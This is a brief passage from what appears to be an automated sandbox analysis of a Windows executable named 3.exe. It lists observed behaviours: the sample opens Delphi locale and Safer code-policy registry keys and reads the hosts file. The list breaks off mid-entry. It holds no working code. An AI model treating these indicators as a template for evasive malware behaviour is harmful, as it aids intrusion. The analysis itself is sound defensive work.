          Source: C:\Users\user\Desktop\3.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\LocalesJump to behavior
          Source: C:\Users\user\Desktop\3.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: C:\Users\user\Desktop\3.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\3.exeFile read: C:\Windows